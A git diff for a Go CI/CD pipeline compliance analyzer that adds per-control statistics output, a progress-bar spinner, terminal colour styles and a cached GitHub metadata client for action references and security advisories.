+ {"Unauthorized", fmt.Sprintf("%d", unauthorized)},
+ }
+ case "pipelineMustNotIncludeHardcodedJobs":
+ total := uint(0)
+ hardcoded := uint(0)
+ if result.PipelineOriginMetrics != nil {
+ total = result.PipelineOriginMetrics.JobTotal
+ hardcoded = result.PipelineOriginMetrics.JobHardcoded
+ }
+ return []statLine{
+ {"Total Jobs", fmt.Sprintf("%d", total)},
+ {"Hardcoded Jobs", fmt.Sprintf("%d", hardcoded)},
+ }
+ case "includesMustBeUpToDate":
+ // _externalIncludeCount strips the project's own pseudo-origin
+ // and the FromPlumber injection so "Total Includes" lines up
+ // with the count of *external* includes the v0.2.x analyzer
+ // reported.
+ total := _externalIncludeCount(result)
+ outdated := uint(0)
+ if result.PipelineOriginMetrics != nil {
+ outdated = result.PipelineOriginMetrics.OriginOutdated
+ }
+ return []statLine{
+ {"Total Includes", fmt.Sprintf("%d", total)},
+ {"Outdated", fmt.Sprintf("%d", outdated)},
+ }
+ case "includesMustNotUseForbiddenVersions":
+ total := _externalIncludeCount(result)
+ authorized := total - findingsCount
+ if authorized < 0 {
+ authorized = 0
+ }
+ return []statLine{
+ {"Total Includes", fmt.Sprintf("%d", total)},
+ {"Using Authorized Versions", fmt.Sprintf("%d", authorized)},
+ {"Using Forbidden Versions", fmt.Sprintf("%d", findingsCount)},
+ }
+ case "pipelineMustNotEnableDebugTrace":
+ // "Variables Checked" mirrors v0.2.x: the total number of
+ // variable bindings the analyzer scanned across every job and
+ // the pipeline globals β not the size of the forbidden list.
+ // On a 27-job pipeline this lands around 50β60 because
+ // imported security templates each carry their own set.
+ return []statLine{
+ {"Variables Checked", fmt.Sprintf("%d", _countAllVariableBindings(result))},
+ {"Forbidden Found", fmt.Sprintf("%d", findingsCount)},
+ }
+ case "pipelineMustNotOverrideJobVariables":
+ // Override checks only apply to bindings authored by the
+ // project (globals + hardcoded jobs); imported components
+ // legitimately set their own. Mirror that scope here so
+ // "Variables Checked" matches the count actually scanned.
+ return []statLine{
+ {"Variables Checked", fmt.Sprintf("%d", _countProjectAuthoredVariables(result))},
+ {"Overridden Found", fmt.Sprintf("%d", findingsCount)},
+ }
+ case "pipelineMustNotUseUnsafeVariableExpansion":
+ return []statLine{
+ {"Jobs Checked", fmt.Sprintf("%d", jobTotal)},
+ {"Script Lines Checked", fmt.Sprintf("%d", _countScriptLines(result))},
+ {"Unsafe Expansions", fmt.Sprintf("%d", findingsCount)},
+ }
+ case "pipelineMustNotExecuteUnverifiedScripts":
+ return []statLine{
+ {"Jobs Checked", fmt.Sprintf("%d", jobTotal)},
+ {"Script Lines Checked", fmt.Sprintf("%d", _countScriptLines(result))},
+ {"Unverified Scripts", fmt.Sprintf("%d", findingsCount)},
+ }
+ case "securityJobsMustNotBeWeakened":
+ // Stable's "Security Jobs Found" counts how many of the merged
+ // jobs match a configured security pattern β a context-rich
+ // denominator for "0 weakened" findings: 0/14 reads very
+ // differently from 0/0.
+ return []statLine{
+ {"Security Jobs Found", fmt.Sprintf("%d", _countSecurityJobs(result, pc))},
+ {"Weakened Jobs", fmt.Sprintf("%d", findingsCount)},
+ }
+ case "pipelineMustIncludeComponent":
+ var resolved [][]string
+ if pc != nil && pc.Controls.PipelineMustIncludeComponent != nil {
+ if g, err := pc.Controls.PipelineMustIncludeComponent.GetResolvedRequiredGroups(); err == nil {
+ resolved = g
+ }
+ }
+ satisfied := countSatisfiedGroups(resolved, result, "component")
+ return []statLine{
+ {"Requirement Groups", fmt.Sprintf("%d", len(resolved))},
+ {"Satisfied Groups", fmt.Sprintf("%d", satisfied)},
+ }
+ case "pipelineMustIncludeTemplate":
+ var resolved [][]string
+ if pc != nil && pc.Controls.PipelineMustIncludeTemplate != nil {
+ if g, err := pc.Controls.PipelineMustIncludeTemplate.GetResolvedRequiredGroups(); err == nil {
+ resolved = g
+ }
+ }
+ satisfied := countSatisfiedGroups(resolved, result, "template")
+ return []statLine{
+ {"Requirement Groups", fmt.Sprintf("%d", len(resolved))},
+ {"Satisfied Groups", fmt.Sprintf("%d", satisfied)},
+ }
+ case "pipelineMustNotUseDockerInDocker":
+ return []statLine{
+ {"Jobs Checked", fmt.Sprintf("%d", jobTotal)},
+ {"DinD Services Found", fmt.Sprintf("%d", _countDinDServices(result))},
+ {"Insecure Daemon Config", fmt.Sprintf("%d", findingsCount)},
+ }
+ case "branchMustBeProtected":
+ total, toProtect, protected, unprotected := _branchProtectionCounts(result, pc)
+ nonCompliant := 0
+ for _, f := range findings {
+ if f.Code == string(control.CodeBranchNonCompliant) {
+ nonCompliant++
+ }
+ }
+ return []statLine{
+ {"Total Branches", fmt.Sprintf("%d", total)},
+ {"Branches to Protect", fmt.Sprintf("%d", toProtect)},
+ {"Protected Branches", fmt.Sprintf("%d", protected)},
+ {"Unprotected", fmt.Sprintf("%d", unprotected)},
+ {"Non-Compliant", fmt.Sprintf("%d", nonCompliant)},
+ }
+ }
+ return nil
+}
+
+// _countScriptLines walks the merged GitLab CI conf and totals every
+// script line declared on every job (script, before_script,
+// after_script). Used as the "Script Lines Checked" denominator
+// printed under script-scanning controls. The merged conf may be
+// produced by either yaml.v2 (which yields `map[interface{}]any` for
+// nested maps) or yaml.v3 (`map[string]any`); accept both shapes.
+func _countScriptLines(result *control.AnalysisResult) int {
+ if result == nil || result.PipelineImageData == nil || result.PipelineImageData.MergedConf == nil {
+ return 0
+ }
+ total := 0
+ for _, raw := range result.PipelineImageData.MergedConf.GitlabJobs {
+ for _, key := range []string{"script", "before_script", "after_script"} {
+ switch v := _readMapKey(raw, key).(type) {
+ case string:
+ if v != "" {
+ total++
+ }
+ case []interface{}:
+ total += len(v)
+ }
+ }
+ }
+ return total
+}
+
+// _externalIncludeCount returns the number of external origins
+// (component / template / local / remote / project) excluding the
+// project itself, matching the v0.2.x "Total Includes" denominator.
+// Walks origin.Origins directly so we can skip both the FromPlumber
+// component (which Plumber injects implicitly when used) and the
+// project's own pseudo-origin even when OriginProject stays at 0 in
+// the metrics summary.
+func _externalIncludeCount(result *control.AnalysisResult) int {
+ if result == nil || result.PipelineOriginData == nil {
+ return 0
+ }
+ count := 0
+ for i := range result.PipelineOriginData.Origins {
+ o := &result.PipelineOriginData.Origins[i]
+ if o.FromPlumber {
+ continue
+ }
+ // Skip the project's own root origin: the .gitlab-ci.yml is
+ // not an "include" in the user-facing sense. The origin type
+ // surfaces as either "project" or "hardcoded" depending on
+ // the collector path.
+ if o.OriginType == "" || o.OriginType == "project" || o.OriginType == "hardcoded" {
+ continue
+ }
+ count++
+ }
+ return count
+}
+
+// _countProjectAuthoredVariables counts variable bindings the project
+// owns: pipeline-level globals plus any job whose origin is the
+// project's own .gitlab-ci.yml (originType == "project" or hardcoded).
+// Imported component / template jobs are excluded β those bindings
+// belong to upstream and the user cannot remove them.
+func _countProjectAuthoredVariables(result *control.AnalysisResult) int {
+ if result == nil || result.PipelineImageData == nil || result.PipelineImageData.MergedConf == nil {
+ return 0
+ }
+ total := 0
+ if g := result.PipelineImageData.MergedConf.GlobalVariables; g != nil {
+ total += len(g)
+ }
+ if result.PipelineOriginData == nil || result.PipelineOriginData.JobMap == nil {
+ return total
+ }
+ hardcoded := result.PipelineOriginData.JobHardcodedMap
+ for name, raw := range result.PipelineImageData.MergedConf.GitlabJobs {
+ // Only count jobs the user authors directly; imported
+ // component / template variables fall outside this control's
+ // scope (see ISSUE-205 rule guard).
+ if hardcoded == nil || !hardcoded[name] {
+ continue
+ }
+ v := _readMapKey(raw, "variables")
+ switch m := v.(type) {
+ case map[string]interface{}:
+ total += len(m)
+ case map[interface{}]interface{}:
+ total += len(m)
+ }
+ }
+ return total
+}
+
+// _countAllVariableBindings totals every distinct (job, variable)
+// binding the analyzer can see, plus pipeline-level globals. The
+// merged conf is the source of truth β it materialises variables
+// inherited from imported components/templates that the IR Job map
+// flattens away.
+func _countAllVariableBindings(result *control.AnalysisResult) int {
+ if result == nil || result.PipelineImageData == nil || result.PipelineImageData.MergedConf == nil {
+ return 0
+ }
+ total := 0
+ for _, raw := range result.PipelineImageData.MergedConf.GitlabJobs {
+ v := _readMapKey(raw, "variables")
+ switch m := v.(type) {
+ case map[string]interface{}:
+ total += len(m)
+ case map[interface{}]interface{}:
+ total += len(m)
+ }
+ }
+ if g := result.PipelineImageData.MergedConf.GlobalVariables; g != nil {
+ total += len(g)
+ }
+ return total
+}
+
+// _countSecurityJobs walks the merged conf and counts how many job
+// names match a configured security-job pattern. When the user has
+// not customised the patterns, fall back to the conventional GitLab
+// security-template suffixes (-sast, secret_detection, dependency-
+// scanning, container-scanning, license-scanning, dast).
+func _countSecurityJobs(result *control.AnalysisResult, pc *configuration.PlumberConfig) int {
+ if result == nil || result.PipelineImageData == nil || result.PipelineImageData.MergedConf == nil {
+ return 0
+ }
+ patterns := []string{}
+ if pc != nil && pc.Controls.SecurityJobsMustNotBeWeakened != nil {
+ patterns = pc.Controls.SecurityJobsMustNotBeWeakened.SecurityJobPatterns
+ }
+ if len(patterns) == 0 {
+ patterns = []string{
+ "*-sast", "*sast*", "secret_detection", "secret-detection",
+ "dependency_scanning", "dependency-scanning",
+ "container_scanning", "container-scanning",
+ "license_scanning", "license-scanning",
+ "dast", "*dast*",
+ }
+ }
+ count := 0
+ for name := range result.PipelineImageData.MergedConf.GitlabJobs {
+ if _matchesAnyGlob(name, patterns) {
+ count++
+ }
+ }
+ return count
+}
+
+// _matchesAnyGlob is a tiny wildcard matcher (only '*' is meaningful)
+// so we stay free of an external glob dependency in the renderer.
+func _matchesAnyGlob(name string, patterns []string) bool {
+ for _, p := range patterns {
+ if _globMatch(p, name) {
+ return true
+ }
+ }
+ return false
+}
+
+func _globMatch(pattern, name string) bool {
+ // Trivial cases with no wildcard: exact match.
+ if !strings.Contains(pattern, "*") {
+ return pattern == name
+ }
+ parts := strings.Split(pattern, "*")
+ pos := 0
+ for i, part := range parts {
+ if part == "" {
+ continue
+ }
+ idx := strings.Index(name[pos:], part)
+ if idx < 0 {
+ return false
+ }
+ // First non-empty part must anchor at start unless the pattern
+ // began with '*'.
+ if i == 0 && idx != 0 && !strings.HasPrefix(pattern, "*") {
+ return false
+ }
+ pos += idx + len(part)
+ }
+ // Last non-empty part must anchor at end unless pattern ended in '*'.
+ if !strings.HasSuffix(pattern, "*") && pos != len(name) {
+ return false
+ }
+ return true
+}
+
+// _branchProtectionCounts mirrors v0.2.x: walks every detected branch
+// against the user policy patterns and the upstream protection rules,
+// returning Total / ToProtect / Protected / Unprotected.
+func _branchProtectionCounts(result *control.AnalysisResult, pc *configuration.PlumberConfig) (total, toProtect, protected, unprotected int) {
+ if result == nil || result.ProtectionData == nil {
+ return 0, 0, 0, 0
+ }
+ branches := result.ProtectionData.Branches
+ total = len(branches)
+ if pc == nil || pc.Controls.BranchMustBeProtected == nil {
+ return total, 0, 0, 0
+ }
+ cfg := pc.Controls.BranchMustBeProtected
+ defaultBranch := result.DefaultBranch
+ patterns := cfg.NamePatterns
+ defaultProtected := cfg.DefaultMustBeProtected != nil && *cfg.DefaultMustBeProtected
+ // Branch protections in GitLab are patterns themselves (e.g.
+ // "main", "release/*"); a branch is "protected" iff at least one
+ // declared protection pattern matches its name.
+ protectionPatterns := make([]string, 0, len(result.ProtectionData.BranchProtections))
+ for _, p := range result.ProtectionData.BranchProtections {
+ protectionPatterns = append(protectionPatterns, p.ProtectionPattern)
+ }
+ for _, name := range branches {
+ matches := false
+ if defaultProtected && name == defaultBranch {
+ matches = true
+ }
+ if !matches && _matchesAnyGlob(name, patterns) {
+ matches = true
+ }
+ if matches {
+ toProtect++
+ if _matchesAnyGlob(name, protectionPatterns) {
+ protected++
+ } else {
+ unprotected++
+ }
+ }
+ }
+ return total, toProtect, protected, unprotected
+}
+
+// _readMapKey reads `key` from a value that may be either a
+// map[string]any or a map[interface{}]any. Returns nil otherwise.
+func _readMapKey(raw any, key string) any {
+ switch m := raw.(type) {
+ case map[string]interface{}:
+ return m[key]
+ case map[interface{}]interface{}:
+ return m[key]
+ }
+ return nil
+}
+
+// _countDinDServices counts jobs that wire a Docker-in-Docker
+// service (an entry under `services:` whose image string contains
+// "dind"). Walks the merged conf so we see services declared in
+// imported templates, not just the main job images. Mirrors the
+// legacy "DinD Services Found" stat.
+func _countDinDServices(result *control.AnalysisResult) int {
+ if result == nil || result.PipelineImageData == nil || result.PipelineImageData.MergedConf == nil {
+ return 0
+ }
+ count := 0
+ for _, raw := range result.PipelineImageData.MergedConf.GitlabJobs {
+ v := _readMapKey(raw, "services")
+ switch s := v.(type) {
+ case []interface{}:
+ for _, item := range s {
+ if _serviceLooksLikeDind(item) {
+ count++
+ break
+ }
+ }
+ case string:
+ if strings.Contains(s, "dind") {
+ count++
+ }
+ }
+ }
+ return count
+}
+
+// _serviceLooksLikeDind decodes a single services list entry β which
+// may be a bare image string or a {name, alias, ...} map β and
+// reports whether it references a Docker-in-Docker daemon image.
+func _serviceLooksLikeDind(item interface{}) bool {
+ switch v := item.(type) {
+ case string:
+ return strings.Contains(v, "dind")
+ case map[string]interface{}:
+ if name, ok := v["name"].(string); ok {
+ return strings.Contains(name, "dind")
+ }
+ case map[interface{}]interface{}:
+ if name, ok := v["name"].(string); ok {
+ return strings.Contains(name, "dind")
+ }
+ }
+ return false
+}
+
+// countSatisfiedGroups returns how many DNF requirement groups have
+// every required component (or template) actually present in the
+// pipeline. Mirrors the rego matching rules in component_missing /
+// template_missing: an origin matches when its cleaned location, the
+// raw location, or any Plumber-augmented path equals the required
+// entry. The kindFilter is "component" for ISSUE-408 and "template"
+// for ISSUE-405 (anything that is not "component" or "hardcoded").
+func countSatisfiedGroups(groups [][]string, result *control.AnalysisResult, kindFilter string) int {
+ if result == nil || result.PipelineOriginData == nil || len(groups) == 0 {
+ return 0
+ }
+ satisfied := 0
+ for _, group := range groups {
+ if len(group) == 0 {
+ continue
+ }
+ all := true
+ for _, required := range group {
+ if !originGroupMatch(required, result.PipelineOriginData, kindFilter) {
+ all = false
+ break
+ }
+ }
+ if all {
+ satisfied++
+ }
+ }
+ return satisfied
+}
+
+func originGroupMatch(required string, data *collector.GitlabPipelineOriginData, kindFilter string) bool {
+ cleanRequired := utils.CleanOriginPath(required)
+ for i := range data.Origins {
+ o := &data.Origins[i]
+ if !originKindMatches(o.OriginType, kindFilter) {
+ continue
+ }
+ loc := o.GitlabIncludeOrigin.Location
+ if loc == required || utils.CleanOriginPath(loc) == cleanRequired {
+ return true
+ }
+ if o.PlumberOrigin.Path != "" && o.PlumberOrigin.Path == required {
+ return true
+ }
+ }
+ return false
+}
+
+func originKindMatches(originType, kindFilter string) bool {
+ switch kindFilter {
+ case "component":
+ return originType == "component"
+ case "template":
+ return originType != "component" && originType != "hardcoded" && originType != ""
+ default:
+ return false
+ }
+}
+
+// findingGroupsFromRegoFindings converts the Rego engine's flat
+// findings list into groups keyed by ControlName (from the issue-code
+// registry). Used by the GitHub analyze path; will also be used by
+// the GitLab path once all legacy Go controls have been ported.
+func findingGroupsFromRegoFindings(findings []opaengine.Finding) []findingGroup {
+ type bucket struct {
+ title string
+ items []detailedFinding
+ }
+ byControl := map[string]*bucket{}
+ order := []string{}
+
+ for _, f := range findings {
+ info := control.LookupCode(control.ErrorCode(f.Code))
+ key := f.Code
+ title := f.Code
+ docURL := ""
+ if info != nil {
+ if info.ControlName != "" {
+ key = info.ControlName
+ }
+ if info.Title != "" {
+ title = info.Title
+ }
+ docURL = info.DocURL
+ }
+ b, ok := byControl[key]
+ if !ok {
+ b = &bucket{title: title}
+ byControl[key] = b
+ order = append(order, key)
+ }
+ b.items = append(b.items, detailedFinding{
+ Code: control.ErrorCode(f.Code),
+ Message: f.Message,
+ DocURL: docURL,
+ Location: formatFindingLocation(f),
+ DetailLines: detailLinesFromFinding(f),
+ })
+ }
+ sort.Strings(order)
+
+ out := make([]findingGroup, 0, len(order))
+ for _, key := range order {
+ b := byControl[key]
+ out = append(out, findingGroup{
+ Title: b.title,
+ Compliance: 0,
+ Skipped: false,
+ Stats: []statLine{{Label: "Total Findings", Value: fmt.Sprintf("%d", len(b.items))}},
+ Findings: b.items,
+ })
+ }
+ return out
+}
diff --git a/cmd/spinner.go b/cmd/spinner.go
index 698ffdd..51882d2 100644
--- a/cmd/spinner.go
+++ b/cmd/spinner.go
@@ -4,146 +4,134 @@ import (
"fmt"
"os"
"sync"
- "time"
+ "unicode/utf8"
+ "github.com/schollz/progressbar/v3"
"github.com/sirupsen/logrus"
)
-// progressSpinner displays a progress indicator on stderr during long-running operations.
-// It shows an animated spinner with the current step message and a progress bar.
+// spinnerMessageWidth is the fixed cell width the Describe label
+// occupies. The bar + percent + count + elapsed/ETA add roughly
+// another 45 cells; the total line lands around 100 columns, which
+// is a comfortable fit for modern terminals. Keeping the label at
+// a fixed width avoids redraw artefacts when a new message is
+// shorter than the previous one (progressbar/v3 renders with `\r`
+// and does not clear trailing glyphs).
+const spinnerMessageWidth = 52
+
+// progressSpinner wraps schollz/progressbar/v3 to give the analyze
+// command a modern, thick-block progress bar driven by the same
+// Update(step, total, message) interface the legacy hand-rolled
+// spinner exposed. Only the visual rendering changes β no change to
+// orchestration or log plumbing is needed upstream.
type progressSpinner struct {
- mu sync.Mutex
- step int
- total int
- message string
- done chan struct{}
- stopped chan struct{}
- started bool
+ mu sync.Mutex
+ bar *progressbar.ProgressBar
}
-// newSpinner creates a new progressSpinner. Call Start() to begin animation.
+// newSpinner returns an uninitialised progressSpinner. The underlying
+// progress bar is created lazily on the first Update call, at which
+// point the total step count is known.
func newSpinner() *progressSpinner {
- return &progressSpinner{
- done: make(chan struct{}),
- stopped: make(chan struct{}),
- }
+ return &progressSpinner{}
}
-// spinnerFrames are the spinner animation characters
-var spinnerFrames = []string{"β ", "β ", "β Ή", "β Έ", "β Ό", "β ΄", "β ¦", "β §", "β ", "β "}
+// Start is a no-op kept for interface compatibility with the legacy
+// spinner β progressbar/v3 self-renders on every Set/Describe call.
+func (s *progressSpinner) Start() {}
-// Update sets the current progress step and message.
-// This is safe to call from any goroutine.
-func (s *progressSpinner) Update(step, total int, message string) {
+// Stop finalises the progress bar and clears the line so the
+// post-analysis output starts on a clean row.
+func (s *progressSpinner) Stop() {
s.mu.Lock()
defer s.mu.Unlock()
- s.step = step
- s.total = total
- s.message = message
-}
-
-// ClearLine erases the spinner line so log output can print cleanly.
-func (s *progressSpinner) ClearLine() {
- if s.started {
- fmt.Fprintf(os.Stderr, "\r\033[K")
+ if s.bar == nil {
+ return
}
+ _ = s.bar.Finish()
+ fmt.Fprint(os.Stderr, "\r\033[K")
}
-// spinnerLogHook is a logrus hook that clears the spinner line before each log entry.
-type spinnerLogHook struct {
- spinner *progressSpinner
+// Update sets the progress to step/total and updates the label. It is
+// safe to call concurrently.
+func (s *progressSpinner) Update(step, total int, message string) {
+ s.mu.Lock()
+ defer s.mu.Unlock()
+ if s.bar == nil {
+ s.bar = progressbar.NewOptions(total,
+ progressbar.OptionSetWriter(os.Stderr),
+ progressbar.OptionShowCount(),
+ progressbar.OptionSetWidth(20),
+ progressbar.OptionSetTheme(progressbar.Theme{
+ Saucer: "β",
+ SaucerHead: "β",
+ SaucerPadding: "β",
+ BarStart: "",
+ BarEnd: "",
+ }),
+ progressbar.OptionSetRenderBlankState(true),
+ progressbar.OptionClearOnFinish(),
+ )
+ }
+ s.bar.Describe(fmt.Sprintf(" %s", padOrTruncate(message, spinnerMessageWidth)))
+ _ = s.bar.Set(step)
}
-func (h *spinnerLogHook) Levels() []logrus.Level {
- return logrus.AllLevels
+// padOrTruncate returns message cut or padded to exactly width
+// runes. Long identifiers like action names are truncated with an
+// ellipsis so the spinner line keeps a stable width and the
+// progress bar does not jump as the message changes.
+func padOrTruncate(message string, width int) string {
+ if width <= 0 {
+ return ""
+ }
+ n := utf8.RuneCountInString(message)
+ if n == width {
+ return message
+ }
+ if n < width {
+ return message + padding(width-n)
+ }
+ // Truncate with a trailing ellipsis. Common UI convention, keeps
+ // the prefix visible β which for our messages is the most
+ // informative part (`Resolving action /β¦`).
+ if width <= 1 {
+ return message[:width]
+ }
+ runes := []rune(message)
+ return string(runes[:width-1]) + "β¦"
}
-func (h *spinnerLogHook) Fire(_ *logrus.Entry) error {
- h.spinner.ClearLine()
- return nil
+func padding(n int) string {
+ if n <= 0 {
+ return ""
+ }
+ buf := make([]byte, n)
+ for i := range buf {
+ buf[i] = ' '
+ }
+ return string(buf)
}
-// InstallLogHook adds a logrus hook that clears the spinner line before each log message.
-// This prevents log output from being interleaved with the spinner animation.
+// InstallLogHook registers a logrus hook that blanks the current line
+// before a log record is emitted. Without it the progress bar and the
+// log message would fight for the same terminal row and both would
+// end up garbled.
func (s *progressSpinner) InstallLogHook() {
- logrus.AddHook(&spinnerLogHook{spinner: s})
+ logrus.AddHook(&spinnerLogHook{s: s})
}
-// Start begins the spinner animation in a background goroutine.
-// The spinner renders to stderr so it doesn't interfere with stdout output.
-func (s *progressSpinner) Start() {
- s.started = true
- go func() {
- defer close(s.stopped)
- ticker := time.NewTicker(80 * time.Millisecond)
- defer ticker.Stop()
- frameIdx := 0
-
- for {
- select {
- case <-s.done:
- // Render final completion state before clearing
- s.mu.Lock()
- step := s.step
- total := s.total
- msg := s.message
- s.mu.Unlock()
-
- if total > 0 {
- bar := ""
- for i := 0; i < 20; i++ {
- bar += "β"
- }
- fmt.Fprintf(os.Stderr, "\r\033[K β [%s] (%d/%d) %s\n", bar, step, total, msg)
- } else {
- fmt.Fprintf(os.Stderr, "\r\033[K")
- }
- return
- case <-ticker.C:
- s.mu.Lock()
- step := s.step
- total := s.total
- msg := s.message
- s.mu.Unlock()
-
- if total == 0 {
- continue
- }
-
- frame := spinnerFrames[frameIdx%len(spinnerFrames)]
- frameIdx++
-
- // Build progress bar
- barWidth := 20
- filled := 0
- if total > 0 {
- filled = (step * barWidth) / total
- }
- if filled > barWidth {
- filled = barWidth
- }
-
- bar := ""
- for i := 0; i < barWidth; i++ {
- if i < filled {
- bar += "β"
- } else {
- bar += "β"
- }
- }
+type spinnerLogHook struct {
+ s *progressSpinner
+}
- // Render: β [ββββββββββββββββββββ] (3/14) Collecting pipeline origins
- line := fmt.Sprintf("\r\033[K %s [%s] (%d/%d) %s", frame, bar, step, total, msg)
- fmt.Fprint(os.Stderr, line)
- }
- }
- }()
+func (h *spinnerLogHook) Levels() []logrus.Level {
+ return logrus.AllLevels
}
-// Stop terminates the spinner animation and waits for cleanup.
-func (s *progressSpinner) Stop() {
- if s.started {
- close(s.done)
- <-s.stopped // wait for the goroutine to finish rendering
- }
+func (h *spinnerLogHook) Fire(_ *logrus.Entry) error {
+ h.s.mu.Lock()
+ defer h.s.mu.Unlock()
+ fmt.Fprint(os.Stderr, "\r\033[K")
+ return nil
}
diff --git a/cmd/styles.go b/cmd/styles.go
new file mode 100644
index 0000000..7c584a8
--- /dev/null
+++ b/cmd/styles.go
@@ -0,0 +1,149 @@
+package cmd
+
+import "github.com/charmbracelet/lipgloss"
+
+// Palette inspirΓ©e du rendu terminal moderne (style trivy / semgrep /
+// osc-policy). Couleurs hex cohΓ©rentes, lisibles sur fond sombre comme
+// sur fond clair. Les styles sΓ©mantiques (title, muted, β¦) composent
+// ces couleurs pour rester stables si la palette Γ©volue.
+
+// Palette
+var (
+ colCritical = lipgloss.Color("#FF4D4F")
+ colHigh = lipgloss.Color("#FF8C42")
+ colMedium = lipgloss.Color("#F2C744")
+ colLow = lipgloss.Color("#4FACF7")
+ colPass = lipgloss.Color("#5BC976")
+ colAccent = lipgloss.Color("#5CCDEF")
+ colMuted = lipgloss.Color("#6C7280")
+ colBody = lipgloss.Color("#D5D8DC")
+)
+
+// Semantic styles β prefer these over raw colors to keep call sites
+// readable.
+var (
+ styleTitle = lipgloss.NewStyle().Foreground(colBody).Bold(true)
+ styleAccent = lipgloss.NewStyle().Foreground(colAccent)
+ styleMuted = lipgloss.NewStyle().Foreground(colMuted)
+ styleDim = lipgloss.NewStyle().Faint(true)
+ styleError = lipgloss.NewStyle().Foreground(colCritical)
+ styleSuccess = lipgloss.NewStyle().Foreground(colPass)
+ styleCell = lipgloss.NewStyle().Padding(0, 1)
+ styleHeader = lipgloss.NewStyle().Foreground(colBody).Bold(true).Padding(0, 1)
+ styleRule = lipgloss.NewStyle().Foreground(colMuted)
+ styleFail = lipgloss.NewStyle().Foreground(colCritical).Bold(true)
+)
+
+// hrWidth controls the width of the horizontal separator used by
+// section dividers (score banner, etc.).
+const hrWidth = 78
+
+// severityColor returns the palette color associated with a severity
+// label.
+func severityColor(sev string) lipgloss.Color {
+ switch sev {
+ case "critical":
+ return colCritical
+ case "high":
+ return colHigh
+ case "medium":
+ return colMedium
+ case "low":
+ return colLow
+ }
+ return colMuted
+}
+
+// severityIcon returns the emoji icon for a severity label.
+func severityIcon(sev string) string {
+ switch sev {
+ case "critical":
+ return "π΄"
+ case "high":
+ return "π "
+ case "medium":
+ return "π‘"
+ case "low":
+ return "π΅"
+ }
+ return "βͺ"
+}
+
+// scoreLetterLipglossColor maps a Plumber letter grade (AβE) to the
+// palette color used across score banners.
+func scoreLetterLipglossColor(letter string) lipgloss.Color {
+ switch letter {
+ case "A", "B":
+ return colPass
+ case "C":
+ return colMedium
+ case "D":
+ return colHigh
+ }
+ return colCritical
+}
+
+// Block-letter ASCII art for Plumber letter grades (AβE). Each entry
+// is 6 lines tall / 8 columns wide, matching the project's existing
+// banner lettering style.
+var scoreLetterAscii = map[string][]string{
+ "A": {
+ " ββββββ ",
+ "ββββββββ",
+ "ββββββββ",
+ "ββββββββ",
+ "βββ βββ",
+ "βββ βββ",
+ },
+ "B": {
+ "βββββββ ",
+ "ββββββββ",
+ "ββββββββ",
+ "ββββββββ",
+ "ββββββββ",
+ "βββββββ ",
+ },
+ "C": {
+ " βββββββ",
+ "ββββββββ",
+ "βββ ",
+ "βββ ",
+ "ββββββββ",
+ " βββββββ",
+ },
+ "D": {
+ "βββββββ ",
+ "ββββββββ",
+ "βββ βββ",
+ "βββ βββ",
+ "ββββββββ",
+ "βββββββ ",
+ },
+ "E": {
+ "ββββββββ",
+ "ββββββββ",
+ "ββββββ ",
+ "ββββββ ",
+ "ββββββββ",
+ "ββββββββ",
+ },
+}
+
+// scoreLetterAsciiArt returns the block-letter art for the given
+// grade, ready-rendered with its tier color. Unknown letters fall
+// back to the E badge.
+func scoreLetterAsciiArt(letter string) string {
+ lines, ok := scoreLetterAscii[letter]
+ if !ok {
+ lines = scoreLetterAscii["E"]
+ }
+ style := lipgloss.NewStyle().Foreground(scoreLetterLipglossColor(letter)).Bold(true)
+ joined := ""
+ for i, l := range lines {
+ if i > 0 {
+ joined += "\n"
+ }
+ joined += l
+ }
+ return style.Render(joined)
+}
diff --git a/collector/github_metadata.go b/collector/github_metadata.go
new file mode 100644
index 0000000..4dd55f6
--- /dev/null
+++ b/collector/github_metadata.go
@@ -0,0 +1,564 @@
+package collector
+
+import (
+ "encoding/json"
+ "fmt"
+ "os"
+ "regexp"
+ "strings"
+ "sync"
+
+ "github.com/cli/go-gh/v2/pkg/api"
+ version "github.com/hashicorp/go-version"
+)
+
+// EnvDisableGitHubAPI, when set to a truthy value, forces the
+// GitHub metadata client into degraded mode regardless of gh auth
+// state. Set to "1" by the test suite to keep unit tests offline
+// and fast; production code does not read this variable.
+const EnvDisableGitHubAPI = "PLUMBER_DISABLE_GITHUB_API"
+
+// GitHubMetadata is the facts the API-backed policies need to know
+// about a single `owner/repo@ref` action reference.
+//
+// - RepoArchived: the GitHub repo hosting the action is archived.
+// - RefExists: the ref (tag / branch / commit SHA) resolves.
+// - RefKind: "tag", "branch", "commit", "unknown".
+// - TagSha: when RefKind=="tag", the commit SHA the tag
+// currently points at.
+// - LatestTag: the repo's newest release tag, "" when the
+// API returns no releases.
+// - LatestReleaseSha: the SHA that tag resolves to upstream.
+// - RefIsAmbiguous: the ref resolves as BOTH a tag and a branch
+// (ref-confusion).
+// - Advisories: security advisory identifiers from the
+// GitHub Advisory Database whose affected
+// version range covers this ref, if any.
+//
+// Zero value (all fields empty / false) is explicitly "unknown" β it
+// is also what the policies see when the API call failed. They
+// should treat zero value as "I don't know" and stay silent.
+type GitHubMetadata struct {
+ RepoArchived bool
+ RefExists bool
+ RefKind string
+ TagSha string
+ LatestTag string
+ LatestReleaseSha string
+ RefIsAmbiguous bool
+ Advisories []string
+}
+
+// GitHubMetadataClient resolves `owner/repo@ref` references against
+// the real GitHub REST API (via github.com/cli/go-gh which reuses
+// the installed `gh` CLI's stored credentials) and caches every
+// answer so the collector never hits the API twice for the same
+// key. Safe for concurrent use.
+//
+// When `gh` is not authenticated β or go-gh cannot find a token β
+// the client operates in degraded mode: every lookup returns an
+// empty GitHubMetadata and Available() returns false. Policies are
+// expected to key their deny rules on the positive evidence the
+// client surfaces, so the degraded-mode output is a zero-finding
+// run rather than a crash.
+type GitHubMetadataClient struct {
+ rest *api.RESTClient
+ mu sync.Mutex
+ // repoCache maps "owner/repo" to archived state; populated lazily.
+ repoCache map[string]repoCacheEntry
+ // refCache maps "owner/repo@ref" to the resolved metadata.
+ refCache map[string]GitHubMetadata
+ latestCache map[string]string
+ // advisoryCache stores every advisory known for an action (id +
+ // vulnerable version range), keyed by "owner/repo". Filtering to
+ // advisories that actually cover the pinned ref happens on read.
+ advisoryCache map[string][]advisoryInfo
+ // sha2tagCache stores the tag list of a repo indexed by commit
+ // SHA so a pinned SHA can be resolved back to its release tag.
+ // nil entry means "tag list fetched and nothing matches".
+ sha2tagCache map[string]map[string]string
+ disabled bool
+ disableCause error
+}
+
+// advisoryInfo is one vulnerability entry from the GitHub Advisory
+// Database, narrowed to what the policy needs.
+type advisoryInfo struct {
+ GhsaID string
+ VulnerableRange string
+ PatchedVersions string
+}
